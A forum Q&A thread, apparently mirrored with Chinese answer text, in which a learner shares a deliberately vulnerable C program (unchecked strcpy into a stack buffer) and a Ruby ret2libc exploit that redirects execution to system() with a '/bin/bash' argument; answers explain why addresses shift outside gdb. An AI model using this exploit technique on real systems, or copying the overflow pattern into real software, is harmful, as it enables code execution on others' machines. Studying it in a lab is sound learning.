0

I am learning about ret2libc buffer overflow exploits to bypass NX.

My vulnerable code (vuln.c):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];

    if (argc != 2)
        printf("NO\n");
    else {
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
}

Compiled with this command: # gcc -o vuln vuln.c

I then created this simple ret2libc exploit in ruby (exploit.rb):

p = "A"*524
p += [0xb7e9ef10].pack('<I') # system()
p += [0xb7e79e46].pack('<I') # nomal ret val
p += [0xbffff75a].pack('<I') # "/bin/bash"
print(p)

If it run it in gdb with (gdb) r $(ruby exploit.rb) it gives me a nice bash shell.

I then try to run it in a normal shell with # ./vuln $(ruby exploit.rb), but instead of giving me a shell it gives me this instead: sh: 1: g:0:1: not found

ASLR is disabled and the only protection enabled is NX, I think.

Any help is appreciated.

Edit:

I am running this on i686 in case that helps.

4

2 回答 2

2

转移的原因是执行环境。

user@feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user@feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70

这里启动getenv的方式是影响PWN的地址。

于 2013-07-09T19:25:05.550 回答
0

您实现了代码执行,但地址SHELL env var已关闭。尝试[address of shell in gdb] + 4,或在gdb, x/s 0xbffff75a+4.

于 2013-06-26T02:39:36.360 回答